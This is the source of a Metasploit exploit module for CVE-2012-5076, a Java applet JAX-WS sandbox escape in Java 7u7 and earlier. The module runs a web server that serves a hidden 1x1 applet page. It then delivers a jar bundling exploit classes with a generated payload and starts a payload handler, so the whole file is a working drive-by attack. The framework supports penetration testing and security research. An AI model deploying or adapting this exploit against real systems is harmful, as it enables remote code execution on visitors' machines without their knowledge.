1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  # include Msf::Exploit::Remote::BrowserAutopwn
12
  # autopwn_info({ :javascript => false })
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Java Applet JAX-WS Remote Code Execution',
19
        'Description' => %q{
20
          This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
21
          code outside of the sandbox as exploited in the wild in November of 2012. The
22
          vulnerability affects Java version 7u7 and earlier.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'Unknown', # Vulnerability Discovery
27
          'juan vazquez' # metasploit module
28
        ],
29
        'References' => [
30
          [ 'CVE', '2012-5076' ],
31
          [ 'OSVDB', '86363' ],
32
          [ 'BID', '56054' ],
33
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
34
          [ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ],
35
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx' ]
36
        ],
37
        'Platform' => %w{java win},
38
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
39
        'Targets' => [
40
          [
41
            'Generic (Java Payload)',
42
            {
43
              'Arch' => ARCH_JAVA,
44
            }
45
          ],
46
          [
47
            'Windows Universal',
48
            {
49
              'Arch' => ARCH_X86,
50
              'Platform' => 'win'
51
            }
52
          ],
53
          [
54
            'Linux x86',
55
            {
56
              'Arch' => ARCH_X86,
57
              'Platform' => 'linux'
58
            }
59
          ]
60
        ],
61
        'DefaultTarget' => 0,
62
        'DisclosureDate' => '2012-10-16',
63
        'Notes' => {
64
          'Reliability' => UNKNOWN_RELIABILITY,
65
          'Stability' => UNKNOWN_STABILITY,
66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
67
        }
68
      )
69
    )
70
  end
71

72
  def on_request_uri(cli, request)
73
    if not request.uri.match(/\.jar$/i)
74
      if not request.uri.match(/\/$/)
75
        send_redirect(cli, get_resource() + '/', '')
76
        return
77
      end
78

79
      print_status("#{self.name} handling request")
80

81
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
82
      return
83
    end
84

85
    paths = [
86
      [ "Exploit.class" ],
87
      [ "MyPayload.class" ]
88
    ]
89

90
    p = regenerate_payload(cli)
91

92
    jar = p.encoded_jar
93

94
    paths.each do |path|
95
      1.upto(path.length - 1) do |idx|
96
        full = path[0, idx].join("/") + "/"
97
        if !(jar.entries.map { |e| e.name }.include?(full))
98
          jar.add_file(full, '')
99
        end
100
      end
101
      fd = File.open(File.join(Msf::Config.data_directory, "exploits", "cve-2012-5076", path), "rb")
102
      data = fd.read(fd.stat.size)
103
      jar.add_file(path.join("/"), data)
104
      fd.close
105
    end
106

107
    print_status("Sending Applet.jar")
108
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
109

110
    handler(cli)
111
  end
112

113
  def generate_html
114
    jar_name = rand_text_alpha(rand(6) + 3) + ".jar"
115
    html = "<html><head></head>"
116
    html += "<body>"
117
    html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
118
    html += "</applet></body></html>"
119
    return html
120
  end
121
end
122

123